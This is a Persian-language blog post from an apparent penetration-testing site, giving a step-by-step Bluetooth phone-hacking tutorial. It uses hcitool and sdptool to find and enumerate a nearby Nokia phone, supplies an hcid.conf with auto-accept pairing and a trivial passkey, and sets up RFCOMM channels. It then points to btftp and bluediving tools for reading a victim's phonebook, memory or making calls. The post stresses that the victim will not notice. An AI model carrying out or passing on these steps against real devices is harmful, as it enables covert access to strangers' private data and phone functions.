تبلیغات اینترنتیclose
بلوتوث هکینگ و استراق سمع بلوتوث
 
جمعه 8 دی 1391 :: نويسنده : dr.koderz

برای این کار از ابزار hcitool استفاده میکنیم برای این منظور دستور hcitool scan رو وارد میکنیم

همینطور که در عکس بالا مشاهده میکنید یک عدد گوشی نوکیا با BD آدرس 0C:DD:EF:70:D4:8C پیدا شده

حالا اگر شما میخواهید دفترچه تلفن یا headset و … این گوشی رو هک کنید نیاز دارید به شماره channel ها

یعنی با کدوم channel میتونید مثلا به دفترچه تلفن دسترسی پیدا کنید و …

نکته این که باید خدمتتون عرض کنم اینه که اگر شما از backtrack 4 استفاده کنید بهتر از backtrack 5 هست چون تو ورژن جدید متاسفانه ابزار های خوبی رو در این مورد از دسترس خارج کردند

و شما نیاز دارید دستی نصب کنید و استفاده کنید ..

حال برای دسترسی به اطلاعات اساسی یا بقول دوستان بخش جمع آوری اطلاعات نیاز داریم به ابزار sdptool برای استفاده از این ابزار به این شکل عمل میکنیم :

sdptool browse BD-Address

که اگه بخوایم روی تارگت بالا اعمال کنیم داریم : sdptool browse 0C:DD:EF:70:D4:8C

نکته : قربانی اصلا متوجه این عمل شما نخواهد شد.

 برای مثال اگه شما میخواهید دفترچه تلفن گوشی رو بخونید یا تماس بگیرید با گوشی قربانی باید channel number اون سرویس رو از روی همین اطلاعات بالا بدست بیارید برای مثال :

 همینطور که میبینید اطلاعات مربوط به سرویس شماره تلفن ها هست که شماره channel 1 رو به خود اختصاص داده

تا اینجای کار ما تونستیم channel های باز رو روی دستگاه قربانی تشخیص بدیم حال باید hci رو کانفیگ کنیم و passkey یا device name و … رو بنویسیم برای اینکار در مسیر :

/etc/blutooth باید فایلی به اسم hcid.conf پیدا کنید اگر موجود نبود بسازیدش و محتویات زیر را داخلش کپی کنید و به دلخواه کانفیگ کنیدش :

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#
# HCI daemon configuration file.
#
 
# HCId options
options {
    # Automatically initialize new devices
    autoinit yes;
 
    # Security Manager mode
    #   none - Security manager disabled
    #   auto - Use local PIN for incoming connections
    #   user - Always ask user for a PIN
    #
    security auto;
 
    # Pairing mode
    #   none  - Pairing disabled
    #   multi - Allow pairing with already paired devices
    #   once  - Pair once and deny successive attempts
    pairing multi;
 
    # Default PIN code for incoming connections
    passkey "1";
}
 
# Default settings for HCI devices
device {
    # Local device name
    #   %d - device id
    #   %h - host name
    name "0x0ptim0us";
 
    # Local device class
    class 0x000000;
 
    # Default packet type
    #pkt_type DH1,DM1,HV1;
 
    # Inquiry and Page scan
    iscan enable; pscan enable;
 
    # Default link mode
    #   none   - no specific policy
    #   accept - always accept incoming connections
    #   master - become master on incoming connections,
    #            deny role switch on outgoing connections
    lm accept,master;
 
    # Default link policy
    #   none    - no specific policy
    #   rswitch - allow role switch
    #   hold    - allow hold mode
    #   sniff   - allow sniff mode
    #   park    - allow park mode
    lp rswitch,hold,sniff,park;
    auth enable;
    encrypt enable;
}

حال باید پروتکل RFCOMM که یک پرتکل ارتباطی برای بلوتوث هست را برای ارتباط پیکربندی کنیم پس برای هر channel باید کانفیگ بشه من اینجا برای ftp و dialup کانفیگش میکنم:
mknod -m 666 /dev/rfcomm0 c 216 22
mknod -m 666 /dev/rfcomm1 c 216 8

آخرین رقم های بالا یعنی 22 و 8 برای channel های مربوط به سرویس ftp , dialup هستند

حال باید به این سرویس ها توسط sdptool وصل بشیم برای اینکار از دستور زیر استفاده میکنیم :

sdptool add –channel=22 DUN
sdptool add –channel=8 FTP

خوب حال شما میتونید برای مثال از ابزار btftp برای ورود به میموری استفاده کنید

در مسیر زیر میتونید ابزار هایی را برای این کار پیدا کنید

/pentest/bluetooth/bluediving/tools

 



نوع مطلب : Back Track, بازدید : 783
برچسب ها : ,




وبگاه جامع امنیت شبکه و تست نفوذ
نویسنده : Dr.Koderz
درباره وبلاگ

ارایه مطالب و ابزارهای سودمند برای شما

آمار کاربران
نام کاربری :
رمز عبور :
ثبت نام عضو جدید
فراموشي رمز عبور

تعداد اعضای آنلاین : 0
اعضای جدید امروز : 1
اعضای جدید دیروز : 0
تعداد کل اعضا : 2
اعضای آنلاین:

آرشيو وبلاگ
خبرنامه
جعبه پیام



جستجو
آمار وبلاگ
آنلاین : 1
بازدید امروز : 1
بازدید دیروز : 0
بازدید هفته گذشته : 1
بازدید ماه گذشته : 1
بازدید سال گذشته : 1
کل بازدید : 1
کل مطالب : 62
نظرات : 13
رنک گوگل :

                    
 
 
  طراحی: مای تم - قدرت : وبلاگدهی ایران